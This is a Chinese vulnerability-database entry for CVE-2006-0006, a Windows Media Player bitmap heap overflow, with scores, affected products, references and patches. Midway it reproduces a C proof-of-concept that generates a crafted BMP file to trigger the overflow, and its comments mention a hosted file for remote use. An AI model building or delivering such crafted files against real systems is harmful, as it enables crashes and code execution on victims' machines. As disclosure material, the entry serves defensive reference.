CVE-2006-0006
CVSS9.3
发布时间 :2006-02-14 17:06:00
修订时间 :2011-10-17 00:00:00
NMCOES    

[原文]Heap-based buffer overflow in the bitmap processing routine in Microsoft Windows Media Player 7.1 on Windows 2000 SP4, Media Player 9 on Windows 2000 SP4 and XP SP1, and Media Player 10 on XP SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted bitmap (.BMP) file that specifies a size of 0 but contains additional data.


[CNNVD]Microsoft Windows Media Player畸形位图文件处理堆溢出漏洞(CNNVD-200602-197)

        Microsoft Windows Media Player是一款非常流行的媒体播放器。
        Microsoft Windows Media Player在处理畸形的位图文件时存在漏洞,攻击者可能利用此漏洞在用户机器上执行任意指令。Windows Media Player可以播放位图格式文件(如.bmp文件)并解码bmp文件,但没有正确地处理声明大小为0的bmp文件。在这种情况下,WMP会分配大小为0的堆,但实际上会以实际文件长度拷贝数据到这个堆,因此声明大小为0的bmp文件会导致溢出。攻击者可以通过诱骗用户使用Windows Media Player打开特制的位图文件导致执行任意指令。

- CVSS (基础分值)

CVSS分值: 9.3 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:windows_media_player:10Microsoft Windows Media Player 10
cpe:/o:microsoft:windows_xp::sp2:tablet_pcMicrosoft windows xp_sp2 tablet_pc
cpe:/o:microsoft:windows_2003_server:r2
cpe:/a:microsoft:windows_media_player:7.1Microsoft windows_media_player 7.1
cpe:/o:microsoft:windows_meMicrosoft Windows ME
cpe:/o:microsoft:windows_98::goldMicrosoft windows 98_gold
cpe:/a:microsoft:windows_media_player:9Microsoft Windows Media Player 9
cpe:/o:microsoft:windows_2000::sp4::fr
cpe:/o:microsoft:windows_2000::sp1Microsoft windows 2000_sp1
cpe:/o:microsoft:windows_98seMicrosoft windows 98_se
cpe:/o:microsoft:windows_xp::sp1:tablet_pcMicrosoft windows xp_sp1 tablet_pc

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:1661Windows Media Player 9 Bitmap Remote Code Execution
oval:org.mitre.oval:def:1578Windows Media Player 7.10 Bitmap Remote Code Execution
oval:org.mitre.oval:def:1256Windows Media Player 8 Bitmap Remote Code Execution
oval:gov.nist.fdcc.patch:def:11532MS06-005: Vulnerability in Windows Media Player Could Allow Remote Code Execution (911565)
oval:gov.nist.USGCB.patch:def:11532MS06-005: Vulnerability in Windows Media Player Could Allow Remote Code Execution (911565)
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0006
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0006
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-197
(官方数据源) CNNVD

- 其它链接及资源

http://www.us-cert.gov/cas/techalerts/TA06-045A.html
(VENDOR_ADVISORY)  CERT  TA06-045A
http://www.kb.cert.org/vuls/id/291396
(VENDOR_ADVISORY)  CERT-VN  VU#291396
http://www.securityfocus.com/bid/16633
(PATCH)  BID  16633
http://www.microsoft.com/technet/security/bulletin/ms06-005.mspx
(VENDOR_ADVISORY)  MS  MS06-005
http://www.eeye.com/html/research/advisories/AD20060214.html
(VENDOR_ADVISORY)  MISC  http://www.eeye.com/html/research/advisories/AD20060214.html
http://securitytracker.com/id?1015627
(PATCH)  SECTRACK  1015627
http://secunia.com/advisories/18835
(VENDOR_ADVISORY)  SECUNIA  18835
http://xforce.iss.net/xforce/xfdb/24488
(UNKNOWN)  XF  win-media-player-bmp-bo(24488)
http://www.vupen.com/english/advisories/2006/0574
(VENDOR_ADVISORY)  VUPEN  ADV-2006-0574
http://www.securityfocus.com/archive/1/archive/1/425158/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060215 Windows Media Player BMP Heap Overflow (MS06-005)
http://www.securityfocus.com/archive/1/archive/1/424983/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060214 [EEYEB-20051017] Windows Media Player BMP Heap Overflow
http://securityreason.com/securityalert/423
(UNKNOWN)  SREASON  423

- 漏洞信息

Microsoft Windows Media Player畸形位图文件处理堆溢出漏洞
高危 缓冲区溢出
2006-02-14 00:00:00 2006-10-30 00:00:00
远程  
        Microsoft Windows Media Player是一款非常流行的媒体播放器。
        Microsoft Windows Media Player在处理畸形的位图文件时存在漏洞,攻击者可能利用此漏洞在用户机器上执行任意指令。Windows Media Player可以播放位图格式文件(如.bmp文件)并解码bmp文件,但没有正确地处理声明大小为0的bmp文件。在这种情况下,WMP会分配大小为0的堆,但实际上会以实际文件长度拷贝数据到这个堆,因此声明大小为0的bmp文件会导致溢出。攻击者可以通过诱骗用户使用Windows Media Player打开特制的位图文件导致执行任意指令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.microsoft.com/downloads/details.aspx?FamilyId=26A0B9E1-1242-4E55-B3D4-8377B83257C6
        http://www.microsoft.com/downloads/details.aspx?FamilyId=8F9EEF16-04F7-4DA8-A0EF-1797B52D0B4B
        http://www.microsoft.com/downloads/details.aspx?FamilyId=182735E1-9382-4F2E-A624-D2316A96B411

- 漏洞信息 (1500)

Windows Media Player 7.1 <= 10 BMP Heap Overflow PoC (MS06-005) (EDBID:1500)
windows dos
2006-02-15 Verified
0 ATmaCA
N/A [点击下载]
/*
* For Remote Exploration (hint):
* http://www.spyinstructors.com/atmaca/research/wmp_remote_poc.asx
*/

/*
*
* Windows Media Player BMP Heap Overflow (MS06-005)
* Bug discovered by eEye - http://www.eeye.com/html/research/advisories/AD20060214.html
* Exploit coded by ATmaCA
* Web: http://www.spyinstructors.com  && http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to Kozan
*
*/

/*
*
* Systems Affected:
* Microsoft Windows Media Player 7.1 through 10
*
* Windows NT 4.0
* Windows 98 / ME
* Windows 2000 SP4
* Windows XP SP1 / SP2
* Windows 2003
*
*
*/

/*
*
* In this vulnerability,payload is loaded to different places in memory each time.
* but some time is very easy to call our shell code :
* http://www.spyinstructors.com/atmaca/research/wmp.JPG
* but some times not =) because of ,no shell this time
*
*/

/*
*
* Microsoft has released a patch for this vulnerability.
* The patch is available at:
* http://www.microsoft.com/technet/security/bulletin/ms06-005.mspx
*
*/

#include <windows.h>
#include <stdio.h>

#define BITMAP_FILE_SIZE        0xA8D2
#define BITMAP_FILE_NAME        "crafted.bmp"

#pragma pack( push )
#pragma pack( 1 )

// bitmap file format - http://atlc.sourceforge.net/bmp.html
//File information header provides general information about the file
typedef struct _BitmapFileHeader {
  WORD    bfType;
  DWORD   bfSize;
  WORD    bfReserved1;
  WORD    bfReserved2;
  DWORD   bfOffBits;
} BMPFHEADER;

//Bitmap information header provides information specific to the image data
typedef struct _BitmapInfoHeader{
  DWORD  biSize;
  LONG   biWidth;
  LONG   biHeight;
  WORD   biPlanes;
  WORD   biBitCount;
  DWORD  biCompression;
  DWORD  biSizeImage;
  LONG   biXPelsPerMeter;
  LONG   biYPelsPerMeter;
  DWORD  biClrUsed;
  DWORD  biClrImportant;
} BMPIHEADER;

#pragma pack( pop )

int main(void)
{
        FILE *File;
        BMPFHEADER *bmp_fheader;
        BMPIHEADER *bmp_iheader;
        char *pszBuffer;

        printf("\nWindows Media Player BMP Heap Overflow (MS06-005)");
        printf("\nBug discovered by eEye");
        printf("\nExploit coded by ATmaCA");
        printf("\nWeb: http://www.spyinstructors.com  && http://www.atmacasoft.com");
        printf("\nE-Mail: atmaca@icqmail.com");
        printf("\nCredit to Kozan");


        if ( (File = fopen(BITMAP_FILE_NAME,"w+b")) == NULL ) {
                printf("\n [E:] fopen()");
                exit(1);
        }

        bmp_fheader=(BMPFHEADER*)malloc(sizeof(BMPFHEADER));
        bmp_iheader=(BMPIHEADER*)malloc(sizeof(BMPIHEADER));
        pszBuffer = (char*)malloc(BITMAP_FILE_SIZE);

        memset(pszBuffer,0x41,BITMAP_FILE_SIZE);

        bmp_fheader->bfType = 0x4D42; // "BM"
        bmp_fheader->bfSize = BITMAP_FILE_SIZE;
        bmp_fheader->bfReserved1 = 0x00;
        bmp_fheader->bfReserved2 = 0x00;

        // eEye - MAGIC
        // Antiviruses will get the signature from here!!!
        bmp_fheader->bfOffBits = 0x00; //( sizeof(BMPFHEADER) + sizeof(BMPIHEADER) );

        bmp_iheader->biSize = 0x28;
        bmp_iheader->biWidth = 0x91;
        bmp_iheader->biHeight = 0x63;
        bmp_iheader->biPlanes = 0x01;
        bmp_iheader->biBitCount = 0x18;
        bmp_iheader->biCompression = 0x00;
        bmp_iheader->biSizeImage = 0xA89C;
        bmp_iheader->biXPelsPerMeter = 0x00;
        bmp_iheader->biYPelsPerMeter = 0x00;
        bmp_iheader->biClrUsed = 0x00;
        bmp_iheader->biClrImportant = 0x00;

        memcpy(pszBuffer,bmp_fheader,sizeof(BMPFHEADER));
        memcpy(pszBuffer+sizeof(BMPFHEADER),bmp_iheader,sizeof(BMPIHEADER));

        fwrite(pszBuffer, BITMAP_FILE_SIZE-1, 1,File);
        fwrite("\x00", 1,1, File); //Terminator

        fclose(File);
        printf("\n\n"  BITMAP_FILE_NAME" has been created in the current directory.\n");

        return 1;
}

// milw0rm.com [2006-02-15]
		

- 漏洞信息

23131
Microsoft Windows Media Player Bitmap File Processing Overflow
Local / Remote Input Manipulation
Loss of Integrity Patch / RCS, Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2006-02-14 Unknow
2006-02-15 2006-02-14

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Microsoft Windows Media Player Bitmap Handling Buffer Overflow Vulnerability
Boundary Condition Error 16633
Yes No
2006-02-14 12:00:00 2006-04-12 04:47:00
Discovered by Marc Maiffret of eEye.

- 受影响的程序版本

Nortel Networks Symposium TAPI Service Provider
Nortel Networks Symposium Agent
Nortel Networks MCS 5200 3.0
Nortel Networks MCS 5100 3.0
Nortel Networks IP softphone 2050
Nortel Networks IP Address Domain Manager
Nortel Networks Enterprise Network Management System
Nortel Networks Contact Center Web Client
Nortel Networks Contact Center Multimedia
Nortel Networks Contact Center Manager
Nortel Networks Contact Center Express
Nortel Networks Contact Center
Nortel Networks CallPilot 3.0
Nortel Networks CallPilot 1001rp
Microsoft Windows Media Player 9.0
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
Microsoft Windows Media Player 8.0
Microsoft Windows Media Player 7.1
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Windows Media Player 10.0
Microsoft Windows ME
Microsoft Windows 98SE
Microsoft Windows 98

- 漏洞讨论

Microsoft Windows Media Player is prone to a remote buffer-overflow vulnerability.

The vulnerability arises when the application handles a skin file containing a specially crafted bitmap image. This issue can also be triggered by just supplying a malicious bitmap to the application. Note, however, that Windows Media Player is not the default handler for bitmap files.

A successful attack can corrupt process memory and result in arbitrary code execution. This may facilitate a remote compromise in the context of the vulnerable user.

- 漏洞利用

Proof-of-concept code has been released for this vulnerability:

http://www.securityfocus.com/data/vulnerabilities/exploits/20060215.wmp-ms06-005.cpp

- 解决方案

Microsoft has released updates to address this vulnerability in supported versions of the Windows operating system.


Microsoft Windows Media Player 10.0

Microsoft Windows Media Player 7.1

Microsoft Windows Media Player 8.0

Microsoft Windows Media Player 9.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站